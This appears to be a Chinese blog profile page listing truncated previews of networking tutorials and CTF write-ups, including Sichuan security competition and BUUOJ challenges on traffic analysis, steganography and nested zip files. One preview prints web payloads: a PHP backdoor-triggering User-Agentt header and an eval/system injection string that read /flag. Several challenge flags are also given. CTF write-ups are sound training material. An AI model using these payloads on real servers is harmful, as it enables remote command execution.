
简介
该用户还未填写简介
擅长的技术栈
可提供的服务
暂无可提供的服务
首先把基本的路由器接口地址按照上图配置好Trust: R1:syssysname R1int e0/0/0ip address 192.168.1.2 24DMZ: R2:syssysname R2int e0/0/0ip address 172.16.1.2 24Untrust: R3:syssysname R3int e0/0/0ip address 202.1.1.2 24进入防火墙把接口地
2023年四川省网络与信息安全技能大赛初赛 个人赛 Writeup
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectrafficWeb签到http://cn-sec.com/archives/313267.htmlUser-Agentt: zerodiumsystem("cat /flag");unsetme这题先放着/?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27)
2024年四川省第二届网信行业技能竞赛-数据安全赛项决赛Writeup
2025数字中国创新大赛-数字安全赛道数据安全产业积分争夺赛决赛Writeup
https://buuoj.cn/challenges#[MRCTF2020]%E5%8D%83%E5%B1%82%E5%A5%97%E8%B7%AF套娃题,拿脚本解压import zipfilename = '0573'while True:fz = zipfile.ZipFile(name + '.zip', 'r')fz.extractall(pwd=bytes(name, 'utf-8')
题目地址:https://buuoj.cn/challenges#wireshark根据提示直接过滤出POST包http.request.method==POSTflag{ffb7567a1d4f4abdffdb54e022f8facd}
题目地址:https://buuoj.cn/challenges#%E6%95%B0%E6%8D%AE%E5%8C%85%E4%B8%AD%E7%9A%84%E7%BA%BF%E7%B4%A2大部分都是TCP的包,直接过滤http的包追踪http流传输内容好像是base64密文,使用这个网站解码base64:https://the-x.cn/base64发现解码出来的内容是jpg图片格式并以自动转
题目地址:https://buuoj.cn/challenges#%E9%95%9C%E5%AD%90%E9%87%8C%E9%9D%A2%E7%9A%84%E4%B8%96%E7%95%8C根据图片名提示使用stegsolve打开在Analyse->Data Extract中调整,得到flagflag{st3g0_saurus_wr3cks}
题目地址:https://buuoj.cn/challenges#%E4%BD%A0%E7%AB%9F%E7%84%B6%E8%B5%B6%E6%88%91%E8%B5%B0stegsolve打开,在Analysis->File Format中找到flag或者使用010 editor或者其他别的编辑器打开都可在文件末尾找到flagflag{stego_is_s0_bor1ing}...